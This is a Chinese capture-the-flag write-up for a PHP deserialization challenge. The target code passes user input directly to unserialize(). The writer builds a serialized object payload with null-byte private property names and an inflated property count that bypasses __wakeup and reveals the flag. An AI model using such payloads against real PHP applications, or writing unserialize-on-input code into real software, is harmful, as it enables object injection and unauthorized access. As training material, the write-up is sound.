[極客大挑戰 2019]PHP1

知識點：PHP序列化與反序列化，最下方有幾個擴展可以看一下

他說備份了，就肯定掃目錄，把源文件備份掃出來

dirsearch掃目錄掃到www.zip壓縮包

 

然後解壓發現是，序列化。

具體特徵如下：

index.php包含如下代碼:接收參數，進行序列化

  <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
  ?>

class.php含: 源碼都放在着

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
         
        }
    }
}
?>

開始構造

聲明一個Name類，包含username,password,且兩個變量都是private修飾,整句話都有用。

然後根據判斷句得知，username必須是admin,password必須是100所以，構造序列化

O是對象，s是字符串，i是數字

因爲是private修飾的所以要加%00充當空格

構造:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

payload：url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

下面是拓展+答疑:

我看大佬的payload的時候，很疑惑爲什麼要寫%00Name%00username這樣的形式？

然後我進行了三種修飾方式的測試:public,protected,private

我忽然明白:

只有public修飾的不用太多的修飾原生態構造就好，而private需要加%00Name%00，

protected則需要使用     %00*%00username這樣的方式

protected修飾變量，運行後回顯代碼內註釋內容

<?php
class Name{
	protected $username = 'nonono';////////////////看這兩行
	protected $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//看這看這看這看這！！！！！！！！！
//運行會輸出 O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
?>

 

public修飾變量，運行後回顯代碼內註釋內容

<?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

 private修飾變量，運行後回顯代碼內註釋內容

<?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
?>